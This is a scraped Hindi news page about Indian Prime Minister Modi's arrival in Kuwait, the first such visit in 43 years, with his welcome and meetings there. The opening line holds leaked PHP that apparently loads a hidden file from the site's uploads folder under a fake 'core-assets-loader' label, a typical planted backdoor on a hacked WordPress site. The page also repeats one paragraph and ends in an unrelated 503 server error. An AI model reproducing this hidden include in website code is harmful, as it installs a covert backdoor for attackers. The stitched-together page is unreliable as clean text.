add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); PM Modi in Kuwait: PM मोदी का कुवैत में गर्मजोशी के साथ स्वागत, 43 साल बाद किसी भारतीय प्रधानमंत्री की यात्रा – SOCH INDIA
Menu

देश
PM Modi in Kuwait: PM मोदी का कुवैत में गर्मजोशी के साथ स्वागत, 43 साल बाद किसी भारतीय प्रधानमंत्री की यात्रा

nobanner

प्रधानमंत्री नरेंद्र मोदी आज यानी शनिवार को कुवैत पहुंच गए हैं. उनका कुवैत दौरा दो दिन का है. जहां एयरपोर्ट पर पीएम मोदी का गर्मजोशी के साथ भव्य स्वागत किया गया. उनको रेड कार्पेट वेलकम दिया गया. इस दौरान पीएम मोदी ने मुस्कराते हुए सबका अभिवादन स्वीकार किया. पीएम मोदी का खासा जोर भारत-कुवैत संबंधों को बेहतर बनाने पर रहेगा. बता दें कि 43 साल बाद किसी भारतीय प्रधानमंत्री की कुवैत की यह पहली यात्रा है.

कुवैत में पीएम मोदी का भव्य स्वागत
कुवैत पहुंचने पर प्रधानमंत्री नरेंद्र मोदी ने सोशल मीडिया प्लेटफॉर्म एक्स पर पोस्ट किया, ‘कुवैत में गर्मजोशी से स्वागत हुआ. यह 43 वर्षों में किसी भारतीय प्रधानमंत्री की पहली यात्रा है. इससे निस्संदेह अलग-अलग क्षेत्रों में भारत-कुवैत दोस्ती मजबूत होगी. मैं आज और कल के लिए निर्धारित कार्यक्रमों की प्रतीक्षा कर रहा हूं.’

कुवैत में पीएम मोदी का भव्य स्वागत
कुवैत पहुंचने पर प्रधानमंत्री नरेंद्र मोदी ने सोशल मीडिया प्लेटफॉर्म एक्स पर पोस्ट किया, ‘कुवैत में गर्मजोशी से स्वागत हुआ. यह 43 वर्षों में किसी भारतीय प्रधानमंत्री की पहली यात्रा है. इससे निस्संदेह अलग-अलग क्षेत्रों में भारत-कुवैत दोस्ती मजबूत होगी. मैं आज और कल के लिए निर्धारित कार्यक्रमों की प्रतीक्षा कर रहा हूं.’

पीएम मोदी ने भारतीयों से की मुलाकात
पीएम मोदी जब कुवैत की राजधानी कुवैत सिटी पहुंचे तो वहां बड़ी तादाद में भारतवंशियों ने हाथ में तिरंगा लेकर उनका स्वागत किया. पीएम मोदी को देखकर उनकी खुशी का ठिकाना नहीं रहा है. उन्होंने पीएम मोदी के सम्मान में मोदी-मोदी के नारे भी लगाए. वहीं, पीएम मोदी ने भी मुस्कराते हुए लोगों का अभिवादन स्वीकार किया. इस दौरान पीएम मोदी ने रामायण और महाभारत को अरबी भाषा में प्रकाशित करने वाले अब्दुल्ला लतीफ अलनेसेफ और उनका अरबी में अनुवाद करने वाले अब्दुल्ला बैरन से मुलाकात की.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.